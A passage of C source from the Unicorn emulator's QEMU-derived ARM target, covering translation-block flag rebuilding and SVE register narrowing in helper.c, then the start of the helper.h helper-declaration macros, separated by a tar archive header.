regime_tcr(env, mmu_idx)->raw_tcr; uint64_t sctlr; int tbii, tbid; FIELD_DP32(flags, TBFLAG_ANY, AARCH64_STATE, 1, flags); /* Get control bits for tagged addresses. */ tbid = aa64_va_parameter_tbi(tcr, mmu_idx); tbii = tbid & ~aa64_va_parameter_tbid(tcr, mmu_idx); FIELD_DP32(flags, TBFLAG_A64, TBII, tbii, flags); FIELD_DP32(flags, TBFLAG_A64, TBID, tbid, flags); if (cpu_isar_feature(aa64_sve, env_archcpu(env))) { int sve_el = sve_exception_el(env, el); uint32_t zcr_len; /* * If SVE is disabled, but FP is enabled, * then the effective len is 0. */ if (sve_el != 0 && fp_el == 0) { zcr_len = 0; } else { zcr_len = sve_zcr_len_for_el(env, el); } FIELD_DP32(flags, TBFLAG_A64, SVEEXC_EL, sve_el, flags); FIELD_DP32(flags, TBFLAG_A64, ZCR_LEN, zcr_len, flags); } sctlr = regime_sctlr(env, stage1); if (arm_cpu_data_is_big_endian_a64(el, sctlr)) { FIELD_DP32(flags, TBFLAG_ANY, BE_DATA, 1, flags); } if (cpu_isar_feature(aa64_pauth, env_archcpu(env))) { /* * In order to save space in flags, we record only whether * pauth is "inactive", meaning all insns are implemented as * a nop, or "active" when some action must be performed. * The decision of which action to take is left to a helper. */ if (sctlr & (SCTLR_EnIA | SCTLR_EnIB | SCTLR_EnDA | SCTLR_EnDB)) { FIELD_DP32(flags, TBFLAG_A64, PAUTH_ACTIVE, 1, flags); } } if (cpu_isar_feature(aa64_bti, env_archcpu(env))) { /* Note that SCTLR_EL[23].BT == SCTLR_BT1. */ if (sctlr & (el == 0 ? SCTLR_BT0 : SCTLR_BT1)) { FIELD_DP32(flags, TBFLAG_A64, BT, 1, flags); } } /* Compute the condition for using AccType_UNPRIV for LDTR et al. */ if (!(env->pstate & PSTATE_UAO)) { switch (mmu_idx) { case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: /* TODO: ARMv8.3-NV */ FIELD_DP32(flags, TBFLAG_A64, UNPRIV, 1, flags); break; case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: /* TODO: ARMv8.4-SecEL2 */ /* * Note that EL20_2 is gated by HCR_EL2.E2H == 1, but EL20_0 is * gated by HCR_EL2.<E2H,TGE> == '11', and so is LDTR. */ if (env->cp15.hcr_el2 & HCR_TGE) { FIELD_DP32(flags, TBFLAG_A64, UNPRIV, 1, flags); } break; default: break; } } return rebuild_hflags_common(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_internal(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); if (is_a64(env)) { return rebuild_hflags_a64(env, el, fp_el, mmu_idx); } else if (arm_feature(env, ARM_FEATURE_M)) { return rebuild_hflags_m32(env, fp_el, mmu_idx); } else { return rebuild_hflags_a32(env, fp_el, mmu_idx); } } void arm_rebuild_hflags(CPUARMState *env) { env->hflags = rebuild_hflags_internal(env); } /* * If we have triggered a EL state change we can't rely on the * translator having passed it to us, we need to recompute. */ void HELPER(rebuild_hflags_m32_newel)(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_m32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_m32)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_m32(env, fp_el, mmu_idx); } /* * If we have triggered a EL state change we can't rely on the * translator having passed it to us, we need to recompute. */ void HELPER(rebuild_hflags_a32_newel)(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_a32)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_a64)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a64(env, el, fp_el, mmu_idx); } static inline void assert_hflags_rebuild_correctly(CPUARMState *env) { #ifdef CONFIG_DEBUG_TCG uint32_t env_flags_current = env->hflags; uint32_t env_flags_rebuilt = rebuild_hflags_internal(env); if (unlikely(env_flags_current != env_flags_rebuilt)) { fprintf(stderr, "TCG hflags mismatch (current:0x%08x rebuilt:0x%08x)\n", env_flags_current, env_flags_rebuilt); abort(); } #endif } void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *pflags) { uint32_t flags = env->hflags; uint32_t pstate_for_ss; *cs_base = 0; assert_hflags_rebuild_correctly(env); if (FIELD_EX32(flags, TBFLAG_ANY, AARCH64_STATE)) { *pc = env->pc; if (cpu_isar_feature(aa64_bti, env_archcpu(env))) { FIELD_DP32(flags, TBFLAG_A64, BTYPE, env->btype, flags); } pstate_for_ss = env->pstate; } else { *pc = env->regs[15]; if (arm_feature(env, ARM_FEATURE_M)) { if (arm_feature(env, ARM_FEATURE_M_SECURITY) && FIELD_EX32(env->v7m.fpccr[M_REG_S], V7M_FPCCR, S) != env->v7m.secure) { FIELD_DP32(flags, TBFLAG_M32, FPCCR_S_WRONG, 1, flags); } if ((env->v7m.fpccr[env->v7m.secure] & R_V7M_FPCCR_ASPEN_MASK) && (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) || (env->v7m.secure && !(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)))) { /* * ASPEN is set, but FPCA/SFPA indicate that there is no * active FP context; we must create a new FP context before * executing any FP insn. */ FIELD_DP32(flags, TBFLAG_M32, NEW_FP_CTXT_NEEDED, 1, flags); } bool is_secure = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; if (env->v7m.fpccr[is_secure] & R_V7M_FPCCR_LSPACT_MASK) { FIELD_DP32(flags, TBFLAG_M32, LSPACT, 1, flags); } } else { /* * Note that XSCALE_CPAR shares bits with VECSTRIDE. * Note that VECLEN+VECSTRIDE are RES0 for M-profile. */ if (arm_feature(env, ARM_FEATURE_XSCALE)) { FIELD_DP32(flags, TBFLAG_A32, XSCALE_CPAR, env->cp15.c15_cpar, flags); } else { FIELD_DP32(flags, TBFLAG_A32, VECLEN, env->vfp.vec_len, flags); FIELD_DP32(flags, TBFLAG_A32, VECSTRIDE, env->vfp.vec_stride, flags); } if (env->vfp.xregs[ARM_VFP_FPEXC] & (1 << 30)) { FIELD_DP32(flags, TBFLAG_A32, VFPEN, 1, flags); } } FIELD_DP32(flags, TBFLAG_AM32, THUMB, env->thumb, flags); FIELD_DP32(flags, TBFLAG_AM32, CONDEXEC, env->condexec_bits, flags); pstate_for_ss = env->uncached_cpsr; } /* * The SS_ACTIVE and PSTATE_SS bits correspond to the state machine * states defined in the ARM ARM for software singlestep: * SS_ACTIVE PSTATE.SS State * 0 x Inactive (the TB flag for SS is always 0) * 1 0 Active-pending * 1 1 Active-not-pending * SS_ACTIVE is set in hflags; PSTATE_SS is computed every TB. */ if (FIELD_EX32(flags, TBFLAG_ANY, SS_ACTIVE) && (pstate_for_ss & PSTATE_SS)) { FIELD_DP32(flags, TBFLAG_ANY, PSTATE_SS, 1, flags); } *pflags = flags; } #ifdef TARGET_AARCH64 /* * The manual says that when SVE is enabled and VQ is widened the * implementation is allowed to zero the previously inaccessible * portion of the registers. The corollary to that is that when * SVE is enabled and VQ is narrowed we are also allowed to zero * the now inaccessible portion of the registers. * * The intent of this is that no predicate bit beyond VQ is ever set. * Which means that some operations on predicate registers themselves * may operate on full uint64_t or even unrolled across the maximum * uint64_t[4]. Performing 4 bits of host arithmetic unconditionally * may well be cheaper than conditionals to restrict the operation * to the relevant portion of a uint16_t[16]. */ void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq) { int i, j; uint64_t pmask; assert(vq >= 1 && vq <= ARM_MAX_VQ); assert(vq <= env_archcpu(env)->sve_max_vq); /* Zap the high bits of the zregs. */ for (i = 0; i < 32; i++) { memset(&env->vfp.zregs[i].d[2 * vq], 0, 16 * (ARM_MAX_VQ - vq)); } /* Zap the high bits of the pregs and ffr. */ pmask = 0; if (vq & 3) { pmask = ~(0xffffffffffffffffULL << (16 * (vq & 3))); } for (j = vq / 4; j < ARM_MAX_VQ / 4; j++) { for (i = 0; i < 17; ++i) { env->vfp.pregs[i].p[j] &= pmask; } pmask = 0; } } /* * Notice a change in SVE vector size when changing EL. */ void aarch64_sve_change_el(CPUARMState *env, int old_el, int new_el, bool el0_a64) { ARMCPU *cpu = env_archcpu(env); int old_len, new_len; bool old_a64, new_a64; /* Nothing to do if no SVE. */ if (!cpu_isar_feature(aa64_sve, cpu)) { return; } /* Nothing to do if FP is disabled in either EL. */ if (fp_exception_el(env, old_el) || fp_exception_el(env, new_el)) { return; } /* * DDI0584A.d sec 3.2: "If SVE instructions are disabled or trapped * at ELx, or not available because the EL is in AArch32 state, then * for all purposes other than a direct read, the ZCR_ELx.LEN field * has an effective value of 0". * * Consider EL2 (aa64, vq=4) -> EL0 (aa32) -> EL1 (aa64, vq=0). * If we ignore aa32 state, we would fail to see the vq4->vq0 transition * from EL2->EL1. Thus we go ahead and narrow when entering aa32 so that * we already have the correct register contents when encountering the * vq0->vq0 transition between EL0->EL1. */ old_a64 = old_el ? arm_el_is_aa64(env, old_el) : el0_a64; old_len = (old_a64 && !sve_exception_el(env, old_el) ? sve_zcr_len_for_el(env, old_el) : 0); new_a64 = new_el ? arm_el_is_aa64(env, new_el) : el0_a64; new_len = (new_a64 && !sve_exception_el(env, new_el) ? sve_zcr_len_for_el(env, new_el) : 0); /* When changing vector length, clear inaccessible state. */ if (new_len < old_len) { aarch64_sve_narrow_vq(env, new_len + 1); } } #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/helper.h��������������������������������������������������������������0000664�0000000�0000000�00000073146�14675241067�0017663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_FLAGS_1(sxtb16, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(uxtb16, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_3(add_setq, i32, env, i32, i32) DEF_HELPER_3(add_saturate, i32, env, i32, i32) DEF_HELPER_3(sub_saturate, i32, env, i32, i32) DEF_HELPER_3(add_usaturate, i32, env, i32, i32) DEF_HELPER_3(sub_usaturate, i32, env, i32, i32) DEF_HELPER_FLAGS_2(sdiv, TCG_CALL_NO_RWG_SE, s32, s32, s32) DEF_HELPER_FLAGS_2(udiv, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_1(rbit, TCG_CALL_NO_RWG_SE, i32, i32) #define PAS_OP(pfx) \ DEF_HELPER_3(pfx ## add8, i32, i32, i32, ptr) \ DEF_HELPER_3(pfx ## sub8, i32, i32, i32, ptr) \ DEF_HELPER_3(pfx ## sub16, i32, i32, i32, ptr) \ DEF_HELPER_3(pfx ## add16, i32, i32, i32, ptr) \ DEF_HELPER_3(pfx ## addsubx, i32, i32, i32, ptr) \ DEF_HELPER_3(pfx ## subaddx, i32, i32, i32, ptr) PAS_OP(s) PAS_OP(u) #undef PAS_OP #define PAS_OP(pfx) \ DEF_HELPER_2(pfx ## add8, i32, i32, i32) \ DEF_HELPER_2(pfx ## sub8, i32, i32, i32) \ DEF_HELPER_2(pfx ## sub16, i32, i32, i32) \ DEF_HELPER_2(pfx ## add16, i32, i32, i32) \ DEF_HELPER_2(pfx ## addsubx, i32, i32, i32) \ DEF_HELPER_2(pfx ## subaddx, i32, i32, i32) PAS_OP(q) PAS_OP(sh) PAS_OP(uq) PAS_OP(uh) #undef PAS_OP DEF_HELPER_3(ssat, i32, env, i32, i32) DEF_HELPER_3(usat, i32, env, i32, i32) DEF_HELPER_3(ssat16, i32, env, i32, i32) DEF_HELPER_3(usat16, i32, env, i32, i32) DEF_HELPER_FLAGS_2(usad8, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_3(sel_flags, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_2(exception_internal, void, env, i32) DEF_HELPER_4(exception_with_syndrome, void, env, i32, i32, i32) DEF_HELPER_2(exception_bkpt_insn, void, env, i32) DEF_HELPER_1(setend, void, env) DEF_HELPER_2(wfi, void, env, i32) DEF_HELPER_1(wfe, void, env) DEF_HELPER_1(yield, void, env) DEF_HELPER_1(pre_hvc, void, env) DEF_HELPER_2(pre_smc, void, env, i32) DEF_HELPER_1(check_breakpoints, void, env) DEF_HELPER_3(cpsr_write, void, env, i32, i32) DEF_HELPER_2(cpsr_write_eret, void, env, i32) DEF_HELPER_1(cpsr_read, i32, env) DEF_HELPER_3(v7m_msr, void, env, i32, i32) DEF_HELPER_2(v7m_mrs, i32, env, i32) DEF_HELPER_2(v7m_bxns, void, env, i32) DEF_HELPER_2(v7m_blxns, void, env, i32) DEF_HELPER_3(v7m_tt, i32, env, i32, i32) DEF_HELPER_1(v7m_preserve_fp_state, void, env) DEF_HELPER_2(v7m_vlstm, void, env, i32) DEF_HELPER_2(v7m_vlldm, void, env, i32) DEF_HELPER_2(v8m_stackcheck, void, env, i32) DEF_HELPER_4(access_check_cp_reg, void, env, ptr, i32, i32) DEF_HELPER_3(set_cp_reg, void, env, ptr, i32) DEF_HELPER_2(get_cp_reg, i32, env, ptr) DEF_HELPER_3(set_cp_reg64, void, env, ptr, i64) DEF_HELPER_2(get_cp_reg64, i64, env, ptr) DEF_HELPER_3(uc_hooksys64, i32, env, i32, ptr) DEF_HELPER_2(get_r13_banked, i32, env, i32) DEF_HELPER_3(set_r13_banked, void, env, i32, i32) DEF_HELPER_3(mrs_banked, i32, env, i32, i32) DEF_HELPER_4(msr_banked, void, env, i32, i32, i32) DEF_HELPER_2(get_user_reg, i32, env, i32) DEF_HELPER_3(set_user_reg, void, env, i32, i32) DEF_HELPER_FLAGS_1(rebuild_hflags_m32_newel, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(rebuild_hflags_m32, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_FLAGS_1(rebuild_hflags_a32_newel, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(rebuild_hflags_a32, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_FLAGS_2(rebuild_hflags_a64, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_1(vfp_get_fpscr, i32, env) DEF_HELPER_2(vfp_set_fpscr, void, env, i32) DEF_HELPER_3(vfp_adds, f32, f32, f32, ptr) DEF_HELPER_3(vfp_addd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_subs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_subd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_muls, f32, f32, f32, ptr) DEF_HELPER_3(vfp_muld, f64, f64, f64, ptr) DEF_HELPER_3(vfp_divs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_divd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_maxs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_maxd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_mins, f32, f32, f32, ptr) DEF_HELPER_3(vfp_mind, f64, f64, f64, ptr) DEF_HELPER_3(vfp_maxnums, f32, f32, f32, ptr) DEF_HELPER_3(vfp_maxnumd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_minnums, f32, f32, f32, ptr) DEF_HELPER_3(vfp_minnumd, f64, f64, f64, ptr) DEF_HELPER_1(vfp_negs, f32, f32) DEF_HELPER_1(vfp_negd, f64, f64) DEF_HELPER_1(vfp_abss, f32, f32) DEF_HELPER_1(vfp_absd, f64, f64) DEF_HELPER_2(vfp_sqrts, f32, f32, env) DEF_HELPER_2(vfp_sqrtd, f64, f64, env) DEF_HELPER_3(vfp_cmps, void, f32, f32, env) DEF_HELPER_3(vfp_cmpd, void, f64, f64, env) DEF_HELPER_3(vfp_cmpes, void, f32, f32, env) DEF_HELPER_3(vfp_cmped, void, f64, f64, env) DEF_HELPER_2(vfp_fcvtds, f64, f32, env) DEF_HELPER_2(vfp_fcvtsd, f32, f64, env) DEF_HELPER_2(vfp_uitoh, f16, i32, ptr) DEF_HELPER_2(vfp_uitos, f32, i32, ptr) DEF_HELPER_2(vfp_uitod, f64, i32, ptr) DEF_HELPER_2(vfp_sitoh, f16, i32, ptr) DEF_HELPER_2(vfp_sitos, f32, i32, ptr) DEF_HELPER_2(vfp_sitod, f64, i32, ptr) DEF_HELPER_2(vfp_touih, i32, f16, ptr) DEF_HELPER_2(vfp_touis, i32, f32, ptr) DEF_HELPER_2(vfp_touid, i32, f64, ptr) DEF_HELPER_2(vfp_touizh, i32, f16, ptr) DEF_HELPER_2(vfp_touizs, i32, f32, ptr) DEF_HELPER_2(vfp_touizd, i32, f64, ptr) DEF_HELPER_2(vfp_tosih, s32, f16, ptr) DEF_HELPER_2(vfp_tosis, s32, f32, ptr) DEF_HELPER_2(vfp_tosid, s32, f64, ptr) DEF_HELPER_2(vfp_tosizh, s32, f16, ptr) DEF_HELPER_2(vfp_tosizs, s32, f32, ptr) DEF_HELPER_2(vfp_tosizd, s32, f64, ptr) DEF_HELPER_3(vfp_toshs_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosls_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touhs_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touls_round_to_zero, i32, f32, i32, ptr) DEF_HELPER_3(vfp_toshd_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosld_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhd_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tould_round_to_zero, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toshh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toulh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_toslh, i32, f16, i32, ptr) DEF_HELPER_3(vfp_touqh, i64, f16, i32, ptr) DEF_HELPER_3(vfp_tosqh, i64, f16, i32, ptr) DEF_HELPER_3(vfp_toshs, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosls, i32, f32, i32, ptr) DEF_HELPER_3(vfp_tosqs, i64, f32, i32, ptr) DEF_HELPER_3(vfp_touhs, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touls, i32, f32, i32, ptr) DEF_HELPER_3(vfp_touqs, i64, f32, i32, ptr) DEF_HELPER_3(vfp_toshd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosld, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tosqd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touhd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_tould, i64, f64, i32, ptr) DEF_HELPER_3(vfp_touqd, i64, f64, i32, ptr) DEF_HELPER_3(vfp_shtos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_sltos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_sqtos, f32, i64, i32, ptr) DEF_HELPER_3(vfp_uhtos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_ultos, f32, i32, i32, ptr) DEF_HELPER_3(vfp_uqtos, f32, i64, i32, ptr) DEF_HELPER_3(vfp_shtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sltod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sqtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_uhtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_ultod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_uqtod, f64, i64, i32, ptr) DEF_HELPER_3(vfp_sltoh, f16, i32, i32, ptr) DEF_HELPER_3(vfp_ultoh, f16, i32, i32, ptr) DEF_HELPER_3(vfp_sqtoh, f16, i64, i32, ptr) DEF_HELPER_3(vfp_uqtoh, f16, i64, i32, ptr) DEF_HELPER_FLAGS_2(set_rmode, TCG_CALL_NO_RWG, i32, i32, ptr) DEF_HELPER_FLAGS_2(set_neon_rmode, TCG_CALL_NO_RWG, i32, i32, env) DEF_HELPER_FLAGS_3(vfp_fcvt_f16_to_f32, TCG_CALL_NO_RWG, f32, f16, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f32_to_f16, TCG_CALL_NO_RWG, f16, f32, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f16_to_f64, TCG_CALL_NO_RWG, f64, f16, ptr, i32) DEF_HELPER_FLAGS_3(vfp_fcvt_f64_to_f16, TCG_CALL_NO_RWG, f16, f64, ptr, i32) DEF_HELPER_4(vfp_muladdd, f64, f64, f64, f64, ptr) DEF_HELPER_4(vfp_muladds, f32, f32, f32, f32, ptr) DEF_HELPER_3(recps_f32, f32, f32, f32, env) DEF_HELPER_3(rsqrts_f32, f32, f32, f32, env) DEF_HELPER_FLAGS_2(recpe_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(recpe_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(recpe_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(rsqrte_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(rsqrte_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rsqrte_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_2(recpe_u32, i32, i32, ptr) DEF_HELPER_FLAGS_2(rsqrte_u32, TCG_CALL_NO_RWG, i32, i32, ptr) DEF_HELPER_FLAGS_4(neon_tbl, TCG_CALL_NO_RWG, i32, i32, i32, ptr, i32) DEF_HELPER_3(shl_cc, i32, env, i32, i32) DEF_HELPER_3(shr_cc, i32, env, i32, i32) DEF_HELPER_3(sar_cc, i32, env, i32, i32) DEF_HELPER_3(ror_cc, i32, env, i32, i32) DEF_HELPER_FLAGS_2(rints_exact, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rintd_exact, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(rints, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(rintd, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(vjcvt, TCG_CALL_NO_RWG, i32, f64, env) DEF_HELPER_FLAGS_2(fjcvtzs, TCG_CALL_NO_RWG, i64, f64, ptr) DEF_HELPER_FLAGS_3(check_hcr_el2_trap, TCG_CALL_NO_WG, void, env, i32, i32) /* neon_helper.c */ DEF_HELPER_FLAGS_3(neon_qadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_qadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_uqadd_s64, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(neon_sqadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) DEF_HELPER_FLAGS_3(neon_sqadd_u64, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_u16, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_u32, i32, env, i32, i32) DEF_HELPER_3(neon_qsub_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qadd_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qadd_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qsub_s64, i64, env, i64, i64) DEF_HELPER_2(neon_hadd_s8, i32, i32, i32) DEF_HELPER_2(neon_hadd_u8, i32, i32, i32) DEF_HELPER_2(neon_hadd_s16, i32, i32, i32) DEF_HELPER_2(neon_hadd_u16, i32, i32, i32) DEF_HELPER_2(neon_hadd_s32, s32, s32, s32) DEF_HELPER_2(neon_hadd_u32, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s8, i32, i32, i32) DEF_HELPER_2(neon_rhadd_u8, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s16, i32, i32, i32) DEF_HELPER_2(neon_rhadd_u16, i32, i32, i32) DEF_HELPER_2(neon_rhadd_s32, s32, s32, s32) DEF_HELPER_2(neon_rhadd_u32, i32, i32, i32) DEF_HELPER_2(neon_hsub_s8, i32, i32, i32) DEF_HELPER_2(neon_hsub_u8, i32, i32, i32) DEF_HELPER_2(neon_hsub_s16, i32, i32, i32) DEF_HELPER_2(neon_hsub_u16, i32, i32, i32) DEF_HELPER_2(neon_hsub_s32, s32, s32, s32) DEF_HELPER_2(neon_hsub_u32, i32, i32, i32) DEF_HELPER_2(neon_cgt_u8, i32, i32, i32) DEF_HELPER_2(neon_cgt_s8, i32, i32, i32) DEF_HELPER_2(neon_cgt_u16, i32, i32, i32) DEF_HELPER_2(neon_cgt_s16, i32, i32, i32) DEF_HELPER_2(neon_cgt_u32, i32, i32, i32) DEF_HELPER_2(neon_cgt_s32, i32, i32, i32) DEF_HELPER_2(neon_cge_u8, i32, i32, i32) DEF_HELPER_2(neon_cge_s8, i32, i32, i32) DEF_HELPER_2(neon_cge_u16, i32, i32, i32) DEF_HELPER_2(neon_cge_s16, i32, i32, i32) DEF_HELPER_2(neon_cge_u32, i32, i32, i32) DEF_HELPER_2(neon_cge_s32, i32, i32, i32) DEF_HELPER_2(neon_pmin_u8, i32, i32, i32) DEF_HELPER_2(neon_pmin_s8, i32, i32, i32) DEF_HELPER_2(neon_pmin_u16, i32, i32, i32) DEF_HELPER_2(neon_pmin_s16, i32, i32, i32) DEF_HELPER_2(neon_pmax_u8, i32, i32, i32) DEF_HELPER_2(neon_pmax_s8, i32, i32, i32) DEF_HELPER_2(neon_pmax_u16, i32, i32, i32) DEF_HELPER_2(neon_pmax_s16, i32, i32, i32) DEF_HELPER_2(neon_abd_u8, i32, i32, i32) DEF_HELPER_2(neon_abd_s8, i32, i32, i32) DEF_HELPER_2(neon_abd_u16, i32, i32, i32) DEF_HELPER_2(neon_abd_s16, i32, i32, i32) DEF_HELPER_2(neon_abd_u32, i32, i32, i32) DEF_HELPER_2(neon_abd_s32, i32, i32, i32) DEF_HELPER_2(neon_shl_u16, i32, i32, i32) DEF_HELPER_2(neon_shl_s16, i32, i32, i32) DEF_HELPER_2(neon_rshl_u8, i32, i32, i32) DEF_HELPER_2(neon_rshl_s8, i32, i32, i32) DEF_HELPER_2(neon_rshl_u16, i32, i32, i32) DEF_HELPER_2(neon_rshl_s16, i32, i32, i32) DEF_HELPER_2(neon_rshl_u32, i32, i32, i32) DEF_HELPER_2(neon_rshl_s32, i32, i32, i32) DEF_HELPER_2(neon_rshl_u64, i64, i64, i64) DEF_HELPER_2(neon_rshl_s64, i64, i64, i64) DEF_HELPER_3(neon_qshl_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u16, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u32, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qshl_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qshl_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qshlu_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qshlu_s64, i64, env, i64, i64) DEF_HELPER_3(neon_qrshl_u8, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_s8, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u16, i32, env, 